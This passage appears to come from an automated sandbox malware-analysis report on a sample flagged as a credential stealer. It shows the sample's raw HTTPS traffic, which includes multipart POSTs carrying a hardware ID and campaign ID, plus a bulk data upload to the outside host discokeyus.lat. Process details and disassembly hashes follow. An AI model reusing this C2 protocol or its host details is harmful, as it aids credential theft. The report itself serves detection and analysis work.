                                                                                                                                              2024-12-20 15:39:44 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                              Data Ascii: 0


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              5192.168.2.449742104.21.21.994437308C:\Users\user\Desktop\gJkNLYV0ax.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-12-20 15:39:46 UTC271OUTPOST /api HTTP/1.1
                                                                                                                                              Connection: Keep-Alive
                                                                                                                                              Content-Type: multipart/form-data; boundary=X3K3GI65MX
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                              Content-Length: 1209
                                                                                                                                              Host: discokeyus.lat
                                                                                                                                              2024-12-20 15:39:46 UTC1209OUTData Raw: 2d 2d 58 33 4b 33 47 49 36 35 4d 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 39 42 37 37 39 36 44 35 30 31 31 36 38 46 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 58 33 4b 33 47 49 36 35 4d 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 58 33 4b 33 47 49 36 35 4d 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 58 33 4b 33 47 49 36 35 4d 58 0d 0a 43 6f 6e 74 65 6e 74 2d
                                                                                                                                              Data Ascii: --X3K3GI65MXContent-Disposition: form-data; name="hwid"79B7796D501168FCAC8923850305D13E--X3K3GI65MXContent-Disposition: form-data; name="pid"1--X3K3GI65MXContent-Disposition: form-data; name="lid"PsFKDg--pablo--X3K3GI65MXContent-
                                                                                                                                              2024-12-20 15:39:47 UTC1127INHTTP/1.1 200 OK
                                                                                                                                              Date: Fri, 20 Dec 2024 15:39:47 GMT
                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                              Connection: close
                                                                                                                                              Set-Cookie: PHPSESSID=sr2aqjga5hh2ldgs7npdoanl52; expires=Tue, 15 Apr 2025 09:26:26 GMT; Max-Age=9999999; path=/
                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                              Pragma: no-cache
                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                              vary: accept-encoding
                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CNN7SQVtysooEGtshV8vmx3XJ%2BQzqC69AwmcGiMY2NUfykwuyQ89tRLIyFpXuSYDpZ0TC9V6IX53oqRglOk%2BhrHnieiTR3h9IrNvvBS22Ga1stO510O6fQekK916be%2F6qQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                              Server: cloudflare
                                                                                                                                              CF-RAY: 8f50ba216eedc402-EWR
                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1661&min_rtt=1650&rtt_var=642&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2831&recv_bytes=2116&delivery_rate=1674311&cwnd=166&unsent_bytes=0&cid=acec5a9f80d04aca&ts=1077&x=0"
                                                                                                                                              2024-12-20 15:39:47 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                              2024-12-20 15:39:47 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                              Data Ascii: 0


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              6192.168.2.449743104.21.21.994437308C:\Users\user\Desktop\gJkNLYV0ax.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-12-20 15:39:49 UTC273OUTPOST /api HTTP/1.1
                                                                                                                                              Connection: Keep-Alive
                                                                                                                                              Content-Type: multipart/form-data; boundary=KI1BBKSJ3B
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                              Content-Length: 570728
                                                                                                                                              Host: discokeyus.lat
                                                                                                                                              2024-12-20 15:39:49 UTC15331OUTData Raw: 2d 2d 4b 49 31 42 42 4b 53 4a 33 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 39 42 37 37 39 36 44 35 30 31 31 36 38 46 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 4b 49 31 42 42 4b 53 4a 33 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4b 49 31 42 42 4b 53 4a 33 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 4b 49 31 42 42 4b 53 4a 33 42 0d 0a 43 6f 6e 74 65 6e 74 2d
                                                                                                                                              Data Ascii: --KI1BBKSJ3BContent-Disposition: form-data; name="hwid"79B7796D501168FCAC8923850305D13E--KI1BBKSJ3BContent-Disposition: form-data; name="pid"1--KI1BBKSJ3BContent-Disposition: form-data; name="lid"PsFKDg--pablo--KI1BBKSJ3BContent-
                                                                                                                                              2024-12-20 15:39:49 UTC15331OUTData Raw: 81 bf 04 dd e0 7d 7c 7e dc 0f 39 8c 0f b8 39 a4 33 01 28 4c a9 cf fa 96 a8 d0 e5 6b 33 bd 10 11 c9 e7 8d 8c 62 c1 e5 06 32 24 77 03 bd a4 ae 34 79 9e d4 43 00 47 36 b2 05 6b 44 93 23 1c 94 2b c3 03 12 8c ef 94 46 de 36 1c 74 86 ec 94 e6 b2 db 6c 72 d1 e3 ee 42 4f 63 37 da a1 a8 16 a6 1c f7 8a e8 df a7 1b 07 83 60 4f d8 dd 73 e6 60 7a 6d 69 7d 38 1f 5a 47 c2 3c 24 cd b6 e3 62 14 c7 ed ed 14 7a c4 aa 92 9f 5d b1 69 8e f8 12 f0 4d c4 69 84 32 b1 fe f1 06 fa 90 de f3 53 f1 26 b1 db 77 05 49 2d ba 82 1a 7f 35 f5 32 a4 5d df 37 7e c0 ae cb f0 9b ba dc c4 87 c8 3d 5f a4 47 f8 0e 44 7b c4 12 2f 9b 67 15 82 02 33 7e 93 c0 0b 1c f2 bc e0 61 bb a6 e5 8e 1a e1 1c 85 e9 63 7c c3 bf 5d 65 12 f9 f9 45 58 4f 8f 33 a5 9a 74 17 9e ac 3a e0 c0 06 8e 75 89 32 a0 86 ae 2c 86
                                                                                                                                              Data Ascii: }|~993(Lk3b2$w4yCG6kD#+F6tlrBOc7`Os`zmi}8ZG<$bz]iMi2S&wI-52]7~=_GD{/g3~ac|]eEXO3t:u2,
                                                                                                                                              2024-12-20 15:39:49 UTC15331OUTData Raw: ac 7a 5a a0 d3 49 ed 7a 35 dd ea b4 65 7f b0 97 71 ba 41 9e 50 cd 7d f4 ed 4a 43 c9 7c d5 dd ae bc 6f 8f 18 d3 a2 31 a5 28 d7 64 b5 a7 f6 b3 7e f3 44 4f 36 04 1d 04 fa 34 5d 19 f7 f8 36 9b 94 e3 18 5f cb 0e 2e 26 a8 a4 21 c8 69 fb c5 4c cb 7b 68 be b2 31 4f 04 f3 16 53 27 1e d0 93 75 c7 4e 4e ec d2 42 c3 68 42 88 7e 1b a6 bc 89 9c fd 41 87 f0 6e f3 2a 43 df 3d 4d 8c 17 f5 8e a7 ff 50 34 bc 42 7b 54 ce 5e 1e ec b6 09 91 23 49 1d 20 b8 99 f8 50 e4 e5 64 43 a2 96 de 9a 9e 90 0e d5 b1 6b d5 c5 f3 9f 94 df eb b1 9d a3 d8 da cc 3b ae 27 d9 7e 8f 4e e6 bb a7 68 3e 41 1c 2f 44 a2 21 be 6d ca 89 70 3e 81 55 b9 ae 05 81 dd 35 52 87 5f 72 ca 1f 46 91 a4 50 02 fb fa 9b 88 82 e5 98 db 51 53 a8 97 ee 72 e4 3c be 99 92 7a 2f 94 0e ff 64 49 22 5b 94 b3 a8 a3 3f 21 f7 7b
                                                                                                                                              Data Ascii: zZIz5eqAP}JC|o1(d~DO64]6_.&!iL{h1OS'uNNBhB~An*C=MP4B{T^#I PdCk;'~Nh>A/D!mp>U5R_rFPQSr<z/dI"[?!{
                                                                                                                                              2024-12-20 15:39:49 UTC15331OUTData Raw: bd 20 a6 00 92 6d 9d e7 f2 4c 91 a6 3f 01 bd 87 40 7d 07 28 ad 6b 33 16 8c 6b 2c f7 bd 80 b2 1d c7 1d d4 74 ab ef 22 98 66 c1 4d 1a 99 00 52 b5 6b 4f 7e 24 d0 bb f7 35 93 89 08 96 bd fa bf 83 a8 62 c8 52 11 94 49 2c 34 b9 e5 5d 09 50 92 89 de 83 84 fa 32 30 86 dd 80 5e c8 fb 80 06 06 3b c0 ad 48 12 06 4a 3a 37 98 0d 6f bb 56 4d 4d 5c 31 b0 ef 90 59 fc cc c8 8e 85 30 ab 71 55 da fb 20 6d 6e 9b 25 a1 65 0d 35 0d 7f 3b a8 14 9d ab 4b 17 5e 2d 01 ad c6 e8 43 91 83 91 0a e8 77 0c 1d 21 80 58 04 82 2d aa 8b b6 54 f4 59 d7 43 e4 82 43 a9 14 7b af f5 2e 05 9a e2 da a9 15 b5 73 7d 51 e9 2b 72 1b 5c 20 10 a5 c5 cf 91 17 2e 5d 00 13 c8 c4 72 9e f4 08 82 eb c1 56 6b 71 92 af d3 f0 02 52 fc 97 5a e8 8c 77 2b 22 b3 9f 34 0a 34 03 b8 f7 2d c8 15 58 61 a9 53 e7 af 58 68
                                                                                                                                              Data Ascii: mL?@}(k3k,t"fMRkO~$5bRI,4]P20^;HJ:7oVMM\1Y0qU mn%e5;K^-Cw!X-TYCC{.s}Q+r\ .]rVkqRZw+"44-XaSXh
                                                                                                                                              2024-12-20 15:39:49 UTC15331OUTData Raw: 68 30 28 12 33 c5 b4 a6 05 a9 12 55 a2 12 97 2f 09 c7 57 20 64 96 27 4c c9 b3 b2 5a 0f 67 1b 0d dc 2d cd be 3d 88 b8 de 99 56 98 7b 32 e6 87 47 c1 f6 5e cf 69 87 dc ca 1b 4c 1c 3d 48 e4 0c 70 dc 86 95 1c cb 7a 10 4a 17 77 cc ad 3a 0d 7f 6e 95 18 63 93 d4 58 b5 62 79 dd a1 2a 34 14 73 e3 0c ee 3f 8b ea 8f bc 0c 72 12 d2 4b 72 30 48 75 fc 62 a5 83 2b 64 bc c0 2c e5 3d d0 c7 98 d8 78 e4 cc 59 c1 7f df a0 2b 8d 7d 71 c8 de 8b 27 d9 3a 31 4d 9a 52 fd e5 5d 64 20 e4 53 4f 6f 41 fe 92 65 d5 cd 6e 9b a9 16 59 c5 2d 49 23 af 9a e7 58 9a 4f 71 db 66 b5 23 45 77 c5 5e 30 2e 4a d9 4c 4c 9c bd d9 7d cd 0a 4e 4d 03 bf 92 f2 92 2a 65 17 63 a1 ac a0 39 27 f8 b3 ad da 32 7f 08 7b 5b 10 2d 3c c5 80 14 d7 49 8e e8 c5 1b 34 2b 2c 5e 72 70 8d 8c f9 b7 16 1a 8c 05 45 30 a4 64
                                                                                                                                              Data Ascii: h0(3U/W d'LZg-=V{2G^iL=HpzJw:ncXby*4s?rKr0Hub+d,=xY+}q':1MR]d SOoAenY-I#XOqf#Ew^0.JLL}NM*ec9'2{[-<I4+,^rpE0d
                                                                                                                                              2024-12-20 15:39:49 UTC15331OUTData Raw: 55 33 a2 03 6b 0c c3 1a 7e 21 0b e4 a7 02 5d f4 c7 fe a8 9f dc a3 dd 56 74 fe 6b 6e da 4a e1 82 38 01 fc 72 68 ad 45 43 9c 00 a7 f8 8c 2c 45 e9 a0 64 97 32 94 f6 38 d0 db d9 a5 49 a0 69 71 b2 bb 08 8f 7f 5b 8d f4 7d 45 52 05 bf 21 a5 cd 08 58 ea b4 b5 f0 dc 3c 1d 9c a2 02 1b 5a 21 30 f2 9d 68 41 34 ab 93 2a 5b 7a 1b 20 4d 01 2d db 41 14 60 2f 15 64 f3 d6 b5 13 09 40 76 b3 92 f7 48 8d 02 ae d7 7b df a9 a0 2f b3 fd 58 1c 48 79 14 1e d2 f4 28 fc 12 60 66 ed 06 0f 65 99 da 45 b2 ff 73 9a ca 20 03 90 9f e4 19 27 2d e8 62 0a a8 07 9e 9c 0f d5 79 a6 94 73 79 eb 19 9d c2 6f 52 65 ba d7 68 a1 fa f6 8d 22 ac f7 91 30 7e f6 f5 ff cc 05 31 70 67 e9 9f 00 06 32 a2 ff 2b c8 6c c1 d5 f0 df 21 68 98 53 01 36 b0 70 a7 b8 c1 75 e0 70 76 ab 04 2a b2 f2 20 0c 41 af df 18 c2
                                                                                                                                              Data Ascii: U3k~!]VtknJ8rhEC,Ed28Iiq[}ER!X<Z!0hA4*[z M-A`/d@vH{/XHy(`feEs '-bysyoReh"0~1pg2+l!hS6pupv* A
                                                                                                                                              2024-12-20 15:39:49 UTC15331OUTData Raw: ae 8c 41 0b 0c 5c 59 0c 90 60 f0 d6 47 10 8b 81 43 6b ab b5 00 8e de 15 a9 c8 14 ba da 0f 6c 33 5d ac 2b 01 e9 51 34 5c a1 8c 8e be 3c 29 c5 3e a0 75 db 20 e7 eb 4f bc 0f 36 66 14 eb 7e b4 30 7a 73 8f d5 3d 3e 2b 40 f6 3c 4b 16 1e 17 5f ff 7c 1e f6 72 f3 de 48 dd 48 55 4b cc 37 31 46 aa bc 72 c2 a4 74 ea ca ea 21 b2 8b b5 20 90 e3 bf 2e 30 ad c6 54 c3 47 9d a7 78 a9 17 a3 72 d5 6d 87 94 d3 c2 55 11 4b 80 95 ee 38 b0 45 07 1d 0e a8 20 a4 bb cb bf 45 7c 69 63 df 6a 22 dc 5a 81 c4 b6 39 74 3c ad ad f5 cf 83 73 d4 28 ea d1 96 6e e5 7b 33 6f ea c4 28 84 0a 5c 89 06 e6 67 ad 98 17 66 25 df 7c 37 07 66 e0 1c d9 f9 6f 4f a4 72 28 47 cd 4f fb 61 f7 ec 3f e8 57 e6 cf e6 e3 1f 01 e3 de 58 1a 1a 1f 85 9b 2a 94 f1 80 44 9b 71 2f ec 0a 9f b4 72 23 81 fc 7c 91 7c ca 1d
                                                                                                                                              Data Ascii: A\Y`GCkl3]+Q4\<)>u O6f~0zs=>+@<K_|rHHUK71Frt! .0TGxrmUK8E E|icj"Z9t<s(n{3o(\gf%|7foOr(GOa?WX*Dq/r#||
                                                                                                                                              2024-12-20 15:39:49 UTC15331OUTData Raw: c9 f1 e6 a0 d5 73 b9 ed a7 08 ff 74 6c 7c 6a 21 04 63 aa 27 e1 11 a2 2a 4b 08 b4 3a 27 f1 5a 7e 24 04 ba ef e0 35 6f 4b f7 9e e7 a6 b3 ec bc e1 9f 72 1f 9a 88 6e d1 e8 9b 33 42 48 8b b1 a5 04 af 9e db a3 0c 29 3f 6c 64 84 67 ec b5 9e 52 16 36 93 d8 58 0a c7 30 8c 3e a5 82 34 5a 8a a6 89 df ea 63 07 fb 4e c9 b5 73 a0 10 74 d7 43 ad 4a d0 f5 90 bb ca cc ac 64 de 4f 57 af d6 ea 63 8f 1c 90 b8 a3 20 2d c5 9f 8c 61 1c 6e f1 f5 e6 77 7f b3 ca 68 5f ef 36 2b 8c 10 14 d0 00 95 1d 47 31 7f 5c 15 ac 46 5e 64 78 92 a5 04 e5 c2 0d 43 c5 4d ee af ef d1 85 80 03 3a ec e3 71 ca 91 ab 0f 22 1e 60 71 e9 59 ae c7 c2 42 53 3a f4 e8 99 81 df ff ca ee de 08 fc 5b ef 98 d3 99 bf 19 07 f6 0f 39 37 67 ad 94 7e 6d 5a 59 ce d9 73 a7 2e 7a 81 f7 d7 84 73 fd cf 19 2b 97 c0 56 db d1
                                                                                                                                              Data Ascii: stl|j!c'*K:'Z~$5oKrn3BH)?ldgR6X0>4ZcNstCJdOWc -anwh_6+G1\F^dxCM:q"`qYBS:[97g~mZYs.zs+V
                                                                                                                                              2024-12-20 15:39:49 UTC15331OUTData Raw: be e0 8b b5 ed 3b ef 9c 63 5a 7c 41 8a 68 12 bc 47 5d 5d 93 22 15 a0 3d 63 93 ae d4 9c 19 cc f9 d2 eb 3e bb f1 e9 5c f4 80 50 71 84 04 f1 4a 38 6e 54 ff ff f5 23 c8 65 70 2f 28 d6 28 ba 19 51 f5 b8 14 19 05 3b 21 0a 86 f9 cd 8b 0e b4 67 07 e4 13 ea 21 d6 ca 39 68 ed f9 3b 9f a3 bf 09 41 1a b8 03 50 33 a9 ed e6 a8 fa 24 5e f3 67 4e 79 d8 d1 0c 31 83 eb ff 3e f0 0f fa e2 e2 bf 76 3b 74 28 83 9c 72 60 35 b7 0b d5 9c 77 a7 f7 e5 64 4b f0 98 f1 61 ad b0 86 fa 9d 13 af 96 20 d6 4d c3 10 0c 63 34 3c bc 05 94 ad 65 fd 90 06 33 d1 ff e7 38 0f e5 c5 82 45 3b 88 7a c3 14 66 e5 f1 79 61 c4 0e 41 fe 95 c4 11 5b 1d f0 3a 2a 19 1a c4 69 e7 2a 3f 60 88 a1 7a bf a6 22 55 21 ff d5 be 18 b3 78 66 d0 af 23 cd 92 c0 f2 ab 51 59 c6 01 88 b9 6c 67 41 94 b9 04 77 b8 b9 19 6c a7
                                                                                                                                              Data Ascii: ;cZ|AhG]]"=c>\PqJ8nT#ep/((Q;!g!9h;AP3$^gNy1>v;t(r`5wdKa Mc4<e38E;zfyaA[:*i*?`z"U!xf#QYlgAwl
                                                                                                                                              2024-12-20 15:39:49 UTC15331OUTData Raw: a1 20 23 75 90 61 21 dd 77 b7 57 ab cf 92 1a e6 e6 c7 7f 6c 29 ee ec 46 b1 df 2c ae 81 12 97 6c 40 4f 3b 9d 11 e6 86 84 7e f4 96 9d c9 82 f7 97 ce 3d 33 38 f1 ee 2b 5a f9 f2 8f 54 1d e9 3f 06 ff e6 1c cf 60 ce 5a f7 e5 7b 8b 9a b2 d4 77 f7 33 53 b3 23 c5 e3 a6 1f e9 ec e0 5b e7 74 71 8e 54 9e 09 ac 7c a6 0c 66 d4 d0 f1 f7 0e ac 65 27 39 ef ac 34 fa 69 4b 3e ee c4 ea f9 50 fc e9 12 d2 75 1d 78 be 19 9a ac 14 7f 28 0f 7a 3f 41 1e 68 be 8e d8 52 ea 9a 99 71 f6 6d 31 53 6f 85 92 39 ba a7 99 e3 5d 24 4d 8c f8 bc 70 d1 23 4b e8 57 9b 18 98 a2 f6 55 94 99 73 5f 99 3e 3c 73 be 08 9d 98 0f c8 7b ca 79 49 c4 2c 40 d0 23 55 41 a1 5e 36 73 09 3b 80 e3 90 d2 7a 82 8a 75 6b d2 7b 3f b5 45 40 d9 67 7a e2 85 1e 20 b0 ca d4 02 38 fd ca 43 cc ba 27 ef e5 c7 e1 08 dd bf c4
                                                                                                                                              Data Ascii: #ua!wWl)F,l@O;~=38+ZT?`Z{w3S#[tqT|fe'94iK>Pux(z?AhRqm1So9]$Mp#KWUs_><s{yI,@#UA^6s;zuk{?E@gz 8C'
                                                                                                                                              2024-12-20 15:39:52 UTC1133INHTTP/1.1 200 OK
                                                                                                                                              Date: Fri, 20 Dec 2024 15:39:52 GMT
                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                              Connection: close
                                                                                                                                              Set-Cookie: PHPSESSID=g7d0edjqt4ohjvqr437j025tiv; expires=Tue, 15 Apr 2025 09:26:30 GMT; Max-Age=9999999; path=/
                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                              Pragma: no-cache
                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                              vary: accept-encoding
                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FKCeZyFHy30Qsh6zb5MDMWqJ8CdbeiE4FdhN%2BAMwBTAPYQaq%2F8vu60T7xCJkIOqJvtIbm0PFZfny6WWq%2FdXVQKoxpIx08MkJapsFBRoFdjOhkn3g75wxMxRX5YrEi0CTcg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                              Server: cloudflare
                                                                                                                                              CF-RAY: 8f50ba332fa75e86-EWR
                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1759&min_rtt=1754&rtt_var=669&sent=282&recv=593&lost=0&retrans=0&sent_bytes=2833&recv_bytes=573265&delivery_rate=1623123&cwnd=240&unsent_bytes=0&cid=a862ddb647e1ba84&ts=3437&x=0"


                                                                                                                                              Statistics

                                                                                                                                              CPU Usage

                                                                                                                                              Click to jump to process

                                                                                                                                              Memory Usage

                                                                                                                                              Click to jump to process

                                                                                                                                              High Level Behavior Distribution

                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                              System Behavior

                                                                                                                                              General

                                                                                                                                              Target ID:0
                                                                                                                                              Start time:10:39:15
                                                                                                                                              Start date:20/12/2024
                                                                                                                                              Path:C:\Users\user\Desktop\gJkNLYV0ax.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:"C:\Users\user\Desktop\gJkNLYV0ax.exe"
                                                                                                                                              Imagebase:0xe60000
                                                                                                                                              File size:1'880'064 bytes
                                                                                                                                              MD5 hash:F158CDB34EB5C4DE5EB858CCE72F94CB
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Yara matches:
                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1998585611.0000000001A3C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1998932614.00000000019F1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1998797783.00000000019F0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1998637407.00000000019E5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                              Reputation:low
                                                                                                                                              Has exited:true

                                                                                                                                              Disassembly

                                                                                                                                              Reset < >

                                                                                                                                                Non-executed Functions

                                                                                                                                                Function 01A586F5 Relevance: 2.8, Strings: 2, Instructions: 316COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000003.2026210139.0000000001A57000.00000004.00000020.00020000.00000000.sdmp, Offset: 01A57000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_3_1a57000_gJkNLYV0ax.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: C:\W$Inte
                                                                                                                                                • API String ID: 0-108695081
                                                                                                                                                • Opcode ID: a946a84af9a8b469fe1e93faf2e8910245474469ff3c4a08d3b4ea5491fe641e
                                                                                                                                                • Instruction ID: 04f10041865101771ab2882346cdf324838a38b8a9d42d3c1bdc1932871ebfc4
                                                                                                                                                • Opcode Fuzzy Hash: a946a84af9a8b469fe1e93faf2e8910245474469ff3c4a08d3b4ea5491fe641e
                                                                                                                                                • Instruction Fuzzy Hash: 9581866240E7C15FC7939B765D664AA3FB1AE2362030E41CBCAC1CF1B3D52D191ADB62
                                                                                                                                                Function 01A4B3F3 Relevance: .5, Instructions: 489COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000003.2026210139.0000000001A46000.00000004.00000020.00020000.00000000.sdmp, Offset: 01A46000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_3_1a3c000_gJkNLYV0ax.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: e04ad489d6de3e8e1d0f5cd0b41409b58730923419c4d4a7dd5c9db23f2af793
                                                                                                                                                • Instruction ID: e366bb0bdceb58d66d1f93ed2381eae680ba1133aca6ccec986b9d7e6dc68200
                                                                                                                                                • Opcode Fuzzy Hash: e04ad489d6de3e8e1d0f5cd0b41409b58730923419c4d4a7dd5c9db23f2af793
                                                                                                                                                • Instruction Fuzzy Hash: 5602376244E3C19FD7578B748C2A695BFB0AF63220B1E81DFC485CF0B3D259884AD726
                                                                                                                                                Function 01A4B4B5 Relevance: .4, Instructions: 415COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000003.2026210139.0000000001A46000.00000004.00000020.00020000.00000000.sdmp, Offset: 01A46000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_3_1a3c000_gJkNLYV0ax.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 82e15745398a79462fc3f387014c57c54e42a491e1e86e4f16952d39ae780a99
                                                                                                                                                • Instruction ID: 1283c69bf1a6843104143cf63764d1370e4592f3caa5d942198852fc268066b1
                                                                                                                                                • Opcode Fuzzy Hash: 82e15745398a79462fc3f387014c57c54e42a491e1e86e4f16952d39ae780a99
                                                                                                                                                • Instruction Fuzzy Hash: BDF1376644E3C19FD7578B748C2A6957FB0AF63220B1E81DFC481CF0B3E259894AD762